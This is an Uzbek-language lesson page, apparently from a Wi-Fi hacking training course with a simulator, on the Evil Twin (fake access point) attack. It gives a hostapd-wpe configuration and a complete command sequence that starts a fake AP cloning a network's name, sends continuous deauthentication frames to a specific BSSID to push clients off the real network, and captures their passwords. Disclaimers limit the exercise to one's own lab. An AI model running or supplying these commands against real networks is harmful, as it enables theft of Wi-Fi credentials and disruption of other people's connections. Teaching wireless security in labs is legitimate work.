Evil Twin (Soxta AP) hujumi
Mijozlarni aldab, parollarini qo'lga kiritishning eng kuchli usuli — asl tarmoq nomi bilan soxta Access Point yaratish. Bu mashq faqat o'z mijozlaringiz va o'z tarmog'ingiz uchun bajariladi.
- Adapterlarni qayta taqsimlash
- hostapd-wpe bilan soxta AP
- Asl mijozlarni deauth qilib soxta tarmoqqa olib o'tish
Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.
hostapd-wpe konfiguratsiyasi
interface=wlan1, ssid=Alsamos, channel=5, wpa=2, wpa_passphrase=12345678. Konfig faylni /etc/hostapd-wpe/hostapd-wpe.conf ga yozing.
Hujumni boshlash
hostapd-wpe ishga tushgach, yangi terminalda asl AP ga deauth yuboring. Mijozlar soxta tarmoqqa ulanishga urinadi va parol terminalda [WPE] Password captured: shaklida ko'rinadi.
To'xtatish
killall hostapd-wpe, airmon-ng stop wlan0mon, systemctl restart NetworkManager — tarmoq holatini tiklash uchun.
Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.
sudo apt install hostapd-wpe -ysudo airmon-ng stop wlan0monsudo ip link set wlan1 down && sudo iw dev wlan1 set type managed && sudo ip link set wlan1 upsudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.confsudo airmon-ng start wlan0sudo aireplay-ng -0 0 -a 7C:8B:CA:B8:B3:B4 wlan0monsudo killall hostapd-wpesudo systemctl restart NetworkManager